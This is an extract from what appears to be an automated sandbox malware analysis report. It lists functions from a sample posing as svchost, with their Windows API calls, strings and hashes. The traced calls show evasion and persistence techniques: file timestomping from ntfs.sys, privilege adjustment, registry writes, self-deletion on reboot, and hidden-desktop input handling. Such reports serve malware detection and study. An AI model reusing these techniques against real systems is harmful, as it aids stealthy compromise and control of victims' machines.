                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 617D7752$keys.zip
                                                                                                                                                                                                                • API String ID: 4256651433-3432394889
                                                                                                                                                                                                                • Opcode ID: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                                • Instruction ID: 01bc7ae2ce25d04de7033877c2fd001da7a8103ffaf1952789f26f4e81343f12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 532137749407898BCB218B389858BEB7BE8EF45340F1489E4EE86C7201EB71E950CB90
                                                                                                                                                                                                                Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                                • API String ID: 1046229350-2760794270
                                                                                                                                                                                                                • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                                Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                • String ID: PnEw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3001685711-2986670995
                                                                                                                                                                                                                • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                                • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                                Function 02BBFBF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 02BBFCCA
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02BBFD7A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BBFD96
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 02BBFDA5
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02BBFDFC
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02BBFE1D
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 02BBFE9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$_snprintf
                                                                                                                                                                                                                • String ID: 0$%x$Content-Length
                                                                                                                                                                                                                • API String ID: 4125937431-3838797520
                                                                                                                                                                                                                • Opcode ID: 86ddd8b05012f25dd6450c51854f182c605ca6283b4c79e86f8653ecc269de54
                                                                                                                                                                                                                • Instruction ID: 34e90bcec4c2040c4fe0e1fbbf7858f59ed453a6097e4557e43a112b97be8fc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86ddd8b05012f25dd6450c51854f182c605ca6283b4c79e86f8653ecc269de54
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 499192B6600702AFC705DF68DC809BBB7A9FF88314B048B59F91987A41D7B0E854CBA1
                                                                                                                                                                                                                Function 02BB9BE0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167synchronizationwindowkeyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9C41
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000000,00000000), ref: 02BB9C5F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D2F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D51
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02BB9D98
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000003,00000000), ref: 02BB9DBE
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,?,?), ref: 02BB9DCB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3783495248-465009422
                                                                                                                                                                                                                • Opcode ID: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                                • Instruction ID: 0bd94dd470583f18444364c3bf1778933e6126b543566baf1e43671aa361e62c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE514932A44684EAD722CF29A848BF53BD0DF43365F0845C9EB918B2D3C3B99555CB90
                                                                                                                                                                                                                Function 02BB5A20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A60
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A8C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5AB3
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5AD4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002B0,000003E8), ref: 02BB5B04
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(000002B0), ref: 02BB5B25
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB5B3E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2971961948-465009422
                                                                                                                                                                                                                • Opcode ID: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                                • Instruction ID: 0549f9420ea0217df0aba14b3a7f9bde85f29d6c88d2419e604151d1a953be39
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B41E7B1D40208AFDB51DFA9D880AEDBBF5FF48311F94416AE904F7200E770AA018FA1
                                                                                                                                                                                                                Function 02BB5B50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5B68
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5B99
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BC5
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BEC
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002B0,000003E8), ref: 02BB5C1D
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(000002B0), ref: 02BB5C3E
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB5C48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2971961948-465009422
                                                                                                                                                                                                                • Opcode ID: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                                • Instruction ID: bd57f18481b553a7f84f78858f3179707275931cedb297bae45731c75c77d53e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C311CB1E40208EFDB90DFA8D884AEDBBF5FF48311F54856AE518E7200E77099018FA1
                                                                                                                                                                                                                Function 02BB6980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81registrystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,9E9388F8a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 1287607259-1862788399
                                                                                                                                                                                                                • Opcode ID: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                                • Instruction ID: 333e9d3fe868d44870a1c9051d30b864e2d1ed92e265bd3d087039e5cf78d296
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF21B5B1940208ABEB55DB74CCC9EEE77BCEF18704F5085E8E295D7141E6B09EC88B50
                                                                                                                                                                                                                Function 02BBE250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                                • GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 3748940024-4251816714
                                                                                                                                                                                                                • Opcode ID: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                                • Instruction ID: fa38084371705f11b52771540435dcac6ed2a32449c54d21f9b914d780291371
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6211E671E4022556DB32AA999C88BFEB75CEF403A5F8405A1FB41E71A0DBA0D45187E4
                                                                                                                                                                                                                Function 02BBD890 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BBD860,00000000,00000000,00000000), ref: 02BBD8A4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?), ref: 02BBD8CD
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD910
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBD917
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBD92B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 731183410-465009422
                                                                                                                                                                                                                • Opcode ID: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                                • Instruction ID: 96c64e46ff88d819774451b82fa4234a10183e546d8466ce4a33770c12b9722e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B11E130A81614ABE7618F64DC0DFEA37E8EF08B51F5446E4FB04AB2D1C7F865108BA4
                                                                                                                                                                                                                Function 02BBF000 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02BBFCE7,00000000,?,02BBFCE7,,-057FF5C8,00000000,00000000,02BBFCE7,?), ref: 02BBF0CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                                • API String ID: 0-1412996494
                                                                                                                                                                                                                • Opcode ID: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                                • Instruction ID: afcf1763f7a27cd820df0c2b889e016f01bce188ef54a459f63945d2e06a6677
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09712531E00206ABEB268E68CC41BFA7BA6DF54318F5488D9F946D7650E7F1D941CB90
                                                                                                                                                                                                                Function 02BB29A0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                                • Instruction ID: a8506eb30a948907720f85284b242b4ed1f92ba90abc5ff83915e04a16885d50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7617E75A00609AFDB21CF68C890BFE7BA5FF49754F104498ED169B340D7B0EA41CB90
                                                                                                                                                                                                                Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2787354276-0
                                                                                                                                                                                                                • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                                Function 02BB9340 Relevance: 13.6, APIs: 9, Instructions: 52synchronizationsleepthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02BB9350
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8F3A
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F49
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteDC.GDI32(00000000), ref: 02BB8F57
